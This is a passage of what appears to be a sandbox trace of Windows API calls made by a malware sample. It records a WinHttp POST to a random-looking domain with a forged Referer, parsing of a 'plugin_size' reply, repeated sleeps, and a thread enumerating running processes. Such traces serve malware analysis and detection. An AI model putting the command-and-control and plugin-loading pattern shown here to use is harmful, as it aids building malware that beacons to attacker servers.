0x441d30 [0304.671] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x10d) returned 0x441d90 [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf81a94ce [0304.671] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x441eb0 [0304.671] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17) returned 0x441ed0 [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa3b43f11 [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x17b41ab9 [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc5f7e5aa [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xacbc9202 [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x211bb46a [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9af250b2 [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xce0a826 [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xefcb3e5e [0304.671] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9d851d22 [0304.671] wsprintfW (in: param_1=0x441d90, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://onxljcxi.org/") returned 42 [0304.672] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441ed0) returned 0x17 [0304.672] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441ed0) returned 1 [0304.672] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441eb0) returned 0x12 [0304.672] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441eb0) returned 1 [0304.672] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441d30) returned 0x4e [0304.672] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441d30) returned 1 [0304.672] WinHttpAddRequestHeaders (hRequest=0x66e790, pwszHeaders="Accept: */*\r\nReferer: http://onxljcxi.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0304.672] WinHttpSendRequest (hRequest=0x66e790, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x4419f0*, dwOptionalLength=0x171, dwTotalLength=0x171, dwContext=0x0) returned 1 [0304.893] WinHttpReceiveResponse (hRequest=0x66e790, lpReserved=0x0) returned 1 [0304.894] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2800) returned 0x441eb0 [0304.894] WinHttpReadData (in: hRequest=0x66e790, lpBuffer=0x441eb0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x10cdfd88 | out: lpBuffer=0x441eb0*, lpdwNumberOfBytesRead=0x10cdfd88*=0x18) returned 1 [0304.897] RtlReAllocateHeap (Heap=0x440000, Flags=0x8, Ptr=0x441eb0, Size=0x5000) returned 0x441eb0 [0304.897] WinHttpReadData (in: hRequest=0x66e790, lpBuffer=0x441ec8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x10cdfd88 | out: lpBuffer=0x441ec8*, lpdwNumberOfBytesRead=0x10cdfd88*=0x0) returned 1 [0304.897] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x400000 [0304.898] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441eb0) returned 1 [0304.898] WinHttpCloseHandle (hInternet=0x66e790) returned 1 [0304.898] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441d90) returned 0x10d [0304.898] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441d90) returned 1 [0304.898] WinHttpCloseHandle (hInternet=0x4cb2730) returned 1 [0304.898] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441cc0) returned 0x68 [0304.898] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441cc0) returned 1 [0304.898] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441ca0) returned 0x12 [0304.898] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441ca0) returned 1 [0304.898] WinHttpCloseHandle (hInternet=0x4b3bd10) returned 1 [0304.899] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441b80) returned 0x10c [0304.899] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441b80) returned 1 [0304.899] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4418b0) returned 0x12b [0304.899] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x4418b0) returned 1 [0304.899] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4419f0) returned 0x17a [0304.899] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x4419f0) returned 1 [0304.899] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0304.899] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x15) returned 0x4418b0 [0304.899] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0304.899] lstrlenA (lpString="plugin_size") returned 11 [0304.899] atoi (_Str="0") returned 0 [0304.899] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0304.899] lstrlenA (lpString="|:|") returned 3 [0304.899] MapViewOfFile (hFileMappingObject=0x24f4, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2860000 [0304.906] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0304.906] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x2860000) returned 0x0 [0304.920] atoi (_Str="0") returned 0 [0304.920] VirtualFree (lpAddress=0x400000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0304.921] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441840) returned 0x26 [0304.921] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x441840) returned 1 [0304.921] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0304.921] Sleep (dwMilliseconds=0x258) [0304.923] Sleep (dwMilliseconds=0x258) [0304.924] Sleep (dwMilliseconds=0x258) [0304.925] Sleep (dwMilliseconds=0x258) [0304.927] Sleep (dwMilliseconds=0x258) [0304.928] Sleep (dwMilliseconds=0x258) [0304.929] Sleep (dwMilliseconds=0x258) [0304.931] Sleep (dwMilliseconds=0x258) [0304.933] Sleep (dwMilliseconds=0x258) [0304.934] Sleep (dwMilliseconds=0x258) [0304.942] Sleep (dwMilliseconds=0x258) [0304.944] Sleep (dwMilliseconds=0x258) [0304.945] Sleep (dwMilliseconds=0x258) [0304.946] Sleep (dwMilliseconds=0x258) [0304.948] Sleep (dwMilliseconds=0x258) [0304.950] Sleep (dwMilliseconds=0x258) [0304.952] Sleep (dwMilliseconds=0x258) [0304.953] Sleep (dwMilliseconds=0x258) [0304.955] Sleep (dwMilliseconds=0x258) [0304.956] Sleep (dwMilliseconds=0x258) [0304.958] Sleep (dwMilliseconds=0x258) [0304.960] Sleep (dwMilliseconds=0x258) [0304.961] Sleep (dwMilliseconds=0x258) [0304.963] Sleep (dwMilliseconds=0x258) [0304.964] Sleep (dwMilliseconds=0x258) [0304.966] Sleep (dwMilliseconds=0x258) [0304.967] Sleep (dwMilliseconds=0x258) [0304.969] Sleep (dwMilliseconds=0x258) [0304.970] Sleep (dwMilliseconds=0x258) [0304.972] Sleep (dwMilliseconds=0x258) [0304.974] Sleep (dwMilliseconds=0x258) [0304.975] Sleep (dwMilliseconds=0x258) [0304.977] Sleep (dwMilliseconds=0x258) [0304.978] Sleep (dwMilliseconds=0x258) [0304.980] Sleep (dwMilliseconds=0x258) [0304.981] Sleep (dwMilliseconds=0x258) [0304.983] Sleep (dwMilliseconds=0x258) [0304.984] Sleep (dwMilliseconds=0x258) [0304.985] Sleep (dwMilliseconds=0x258) [0304.987] Sleep (dwMilliseconds=0x258) [0304.995] Sleep (dwMilliseconds=0x258) [0304.997] Sleep (dwMilliseconds=0x258) [0304.998] Sleep (dwMilliseconds=0x258) [0305.000] Sleep (dwMilliseconds=0x258) [0305.001] Sleep (dwMilliseconds=0x258) [0305.003] Sleep (dwMilliseconds=0x258) [0305.004] Sleep (dwMilliseconds=0x258) [0305.006] Sleep (dwMilliseconds=0x258) [0305.007] Sleep (dwMilliseconds=0x258) [0305.009] Sleep (dwMilliseconds=0x258) [0305.011] Sleep (dwMilliseconds=0x258) [0305.013] Sleep (dwMilliseconds=0x258) [0305.014] Sleep (dwMilliseconds=0x258) [0305.016] Sleep (dwMilliseconds=0x258) [0305.017] Sleep (dwMilliseconds=0x258) [0305.019] Sleep (dwMilliseconds=0x258) [0305.020] Sleep (dwMilliseconds=0x258) [0305.022] Sleep (dwMilliseconds=0x258) [0305.023] Sleep (dwMilliseconds=0x258) [0305.025] Sleep (dwMilliseconds=0x258) [0305.026] Sleep (dwMilliseconds=0x258) [0305.042] Sleep (dwMilliseconds=0x258) [0305.080] Sleep (dwMilliseconds=0x258) [0305.116] Sleep (dwMilliseconds=0x258) [0305.156] Sleep (dwMilliseconds=0x258) [0305.167] Sleep (dwMilliseconds=0x258) [0305.169] Sleep (dwMilliseconds=0x258) [0305.197] Sleep (dwMilliseconds=0x258) [0305.235] Sleep (dwMilliseconds=0x258) [0305.257] Sleep (dwMilliseconds=0x258) [0305.261] Sleep (dwMilliseconds=0x258) [0305.280] Sleep (dwMilliseconds=0x258) [0305.327] Sleep (dwMilliseconds=0x258) [0305.363] Sleep (dwMilliseconds=0x258) [0305.366] Sleep (dwMilliseconds=0x258) [0305.368] Sleep (dwMilliseconds=0x258) [0305.407] Sleep (dwMilliseconds=0x258) [0305.458] Sleep (dwMilliseconds=0x258) [0305.472] Sleep (dwMilliseconds=0x258) [0305.477] Sleep (dwMilliseconds=0x258) [0305.504] Sleep (dwMilliseconds=0x258) [0305.724] Sleep (dwMilliseconds=0x258) Thread: id = 49 os_tid = 0x1350 [0108.476] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2094 [0108.489] Process32First (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.490] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x86, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.492] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.493] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.495] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.496] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.497] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.499] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.501] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.503] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.504] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.506] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.508] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.510] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.512] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.513] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.531] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.532] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.535] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.537] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.539] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0108.541] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.543] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0108.544] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.546] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.548] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0108.550] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0108.552] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0108.554] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0108.556] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.558] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0108.560] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.561] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0108.563] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.565] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.567] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0108.568] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.570] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0108.572] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0108.573] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0108.574] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0108.576] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0108.577] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0108.582] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0108.584] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0108.586] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0108.588] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0108.589] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0108.591] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0108.592] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0108.595] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0108.597] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0108.599] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, 